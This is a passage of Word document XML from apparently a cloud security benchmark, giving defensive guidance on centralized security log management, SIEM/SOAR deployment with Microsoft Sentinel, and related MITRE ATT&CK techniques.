        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Deploy comprehensive monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2131E4" w14:textId="0B6CA7E5" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Use Azure networking monitoring solutions in Azure Monitor for comprehensive network visibility and centralized log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F197D09" w14:textId="27535451" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="196"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Enable traffic analytics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E1151B" w14:textId="3BC573EC" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Send flow logs to Azure Monitor Log Analytics workspace and use Traffic Analytics to provide insights into network traffic patterns, security threats, bandwidth consumption, and policy violations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BF93DC" w14:textId="661AA1A2" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc242449529"/>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Centralize and analyze</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="3BEAFF1B" w14:textId="569D6C9E" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc242449530"/>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>LT-5: Centralize security log management and analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w14:paraId="3278844C" w14:textId="076864E7" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9656CB" w14:textId="5508F539" w:rsidR="00001F1F" w:rsidRPr="00001F1F" w:rsidRDefault="00001F1F" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00001F1F">
        <w:lastRenderedPageBreak/>
        <w:t>Centralize security logs from all cloud services, identity systems, and network infrastructure into a unified platform for correlation and analysis. Centralized aggregation enables detection of multi-stage attacks spanning multiple services that isolated log sources cannot reveal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE712C2" w14:textId="69429A66" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D333007" w14:textId="3A389BC6" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Multi-stage attack invisibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3BDDC4" w14:textId="2B9713D8" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="199"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Sophisticated kill chains spanning identity (Microsoft Entra ID), network (NSG flows), and data (storage access) remain undetected because isolated log silos prevent cross-service correlation and timeline reconstruction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B3CB1B" w14:textId="3333B06A" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Alert fatigue and noise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02632D6A" w14:textId="64F7C124" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Security teams drowning in uncorrelated alerts from dozens of individual services miss critical patterns—high-priority incidents buried in thousands of false positives lacking context and prioritization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FFF36" w14:textId="6D6D5645" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Delayed detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C9AA21" w14:textId="2F4EB846" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t xml:space="preserve">Manual log aggregation and analysis </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>extends</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t xml:space="preserve"> mean time to detect (MTTD) from minutes to days—attackers completing full attack cycles (reconnaissance → execution → exfiltration) before defenders correlate evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FFBD4A" w14:textId="4FB64CC8" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Incomplete threat hunting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2A767" w14:textId="0CAA64E1" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Security analysts cannot perform proactive threat hunting queries spanning multiple services, time ranges, and attack indicators when logs remain scattered across service-specific interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3964D329" w14:textId="1B9FCF30" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Compliance audit failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A25CC7" w14:textId="02D61647" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Regulatory requirements mandate centralized security monitoring and reporting—distributed logs create demonstrable gaps in security operations maturity and audit readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3E1952" w14:textId="1D421140" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Inefficient incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A9C0BC" w14:textId="4161799C" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>IR teams waste critical hours manually pivoting between Azure portal, Log Analytics, service-specific logs, and third-party tools instead of unified investigation workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B47DED" w14:textId="3F5A9A58" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Lost retention and governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A9DE71" w14:textId="79B9437A" w:rsidR="00DC2CC4" w:rsidRDefault="00DC2CC4" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="198"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC2CC4">
        <w:t>Inconsistent retention policies across services result in critical forensic evidence expiring before investigations complete, and lack of centralized access controls expose sensitive logs to unauthorized viewing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EFF286" w14:textId="4A662A1C" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="197"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238AAE6C" w14:textId="35793D35" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99A373" w14:textId="4BB47D6F" w:rsidR="00930B8A" w:rsidRDefault="00930B8A" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:lastRenderedPageBreak/>
        <w:t>impair defenses (T1562) exploiting log fragmentation to avoid correlation-based detection across service boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3C7E00" w14:textId="199E8A73" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F3594" w14:textId="6A4B3372" w:rsidR="00930B8A" w:rsidRDefault="00930B8A" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>cloud infrastructure discovery (T1580) systematically enumerating resources across multiple services—patterns visible only through centralized analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4448C20D" w14:textId="49A2E65B" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00001F1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F3B1BD" w14:textId="02CEC5E2" w:rsidR="00930B8A" w:rsidRDefault="00930B8A" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>use alternate authentication material (T1550) pivoting across services using tokens or credentials—movement traceable only via cross-service log correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26238980" w14:textId="0FE8E35E" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A2A0AB" w14:textId="5F3E1BEF" w:rsidR="00930B8A" w:rsidRDefault="00930B8A" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>data staged (T1074.002) aggregating data from multiple sources before exfiltration—staging patterns detectable through multi-service anomaly analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BDD777" w14:textId="361B8753" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB691B9" w14:textId="4EDC4936" w:rsidR="00930B8A" w:rsidRDefault="00930B8A" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="397"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930B8A">
        <w:t>automated exfiltration (T1020) using distributed extraction across multiple services to avoid individual service volume thresholds—detectable only through aggregated analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12601EAB" w14:textId="08E3B9EC" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00A91907">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>LT-5.1: Implement centralized log aggregation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3609A" w14:textId="0C86ED01" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Transform fragmented logs scattered across services into unified visibility by routing all security telemetry to a central platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D19723A" w14:textId="139CC463" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Aggregate logs centrally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C3C24" w14:textId="05AEF7AB" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Integrate Azure activity logs into a centralized Log Analytics workspace along with resource diagnostic logs from all services to enable cross-resource correlation and unified investigation workflows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C3E4C7" w14:textId="0090B9DA" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Query aggregated logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539BCC7" w14:textId="051A12D0" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Use Azure Monitor with KQL queries to perform analytics on aggregated logs from Azure services, endpoint devices, network resources, and other security systems for pattern detection and investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE00A8A" w14:textId="6A3D9E00" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Configure alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BDAB99" w14:textId="12811E37" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Create alert rules using the logs aggregated from multiple sources to detect security threats and operational issues through correlation logic spanning multiple log sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C9030" w14:textId="03E2B2A6" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="200"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Establish data governance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465558F2" w14:textId="139C37B4" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Define data ownership, implement role-based access controls to logs, specify storage locations for compliance requirements, and set retention policies balancing investigation needs with cost and regulatory obligations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149E03FF" w14:textId="42417B0B" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00A91907">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LT-5.2: Deploy SIEM and SOAR capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E3B19" w14:textId="75DEEDA3" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Elevate log aggregation into proactive security operations by deploying security information and event management (SIEM) with automated response capabilities. SIEM transforms raw logs into actionable intelligence through correlation rules, threat analytics, and automated incident workflows—enabling security teams to detect and respond to threats at machine speed rather than manual investigation pace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6E8268" w14:textId="2D88B913" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Deploy SIEM platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77940B1B" w14:textId="7D39FA66" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Onboard Microsoft Sentinel to provide security information event management (SIEM) and security orchestration automated response (SOAR) capabilities for centralized security analysis and incident response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF77F6B" w14:textId="6795460D" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Connect data sources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FCC8DA" w14:textId="15197BDE" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Connect data sources to Microsoft Sentinel including Azure services, Microsoft 365, third-party security solutions, and on-premises systems to establish comprehensive security visibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFD96C" w14:textId="49A21B81" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Configure analytics rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF3F349" w14:textId="3CECCC40" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Create detection rules in Sentinel to identify threats and automatically create incidents based on correlated security events spanning multiple log sources and time periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3A678" w14:textId="4088212D" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Automate response actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CA398" w14:textId="4A1F5AE8" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Implement automated response playbooks using Logic Apps to orchestrate incident response actions including containment, notification, and remediation workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A65EC80" w14:textId="01902356" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Enable monitoring dashboards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F383EA" w14:textId="31E380B7" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Deploy Sentinel workbooks and dashboards for security monitoring, threat hunting, compliance reporting, and executive-level security posture visibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119A87DB" w14:textId="7DB0F11C" w:rsidR="00A91907" w:rsidRDefault="00A91907">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="201"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Integrate AI-powered analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B423E6C" w14:textId="16E385E0" w:rsidR="00A91907" w:rsidRDefault="00A91907" w:rsidP="00F84C77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00A91907">
        <w:t>Enable Microsoft Security Copilot integration with Sentinel to provide AI-powered incident investigation, threat hunting, and guided response recommendations using natural language queries across centralized security logs</w:t>
      </w:r>
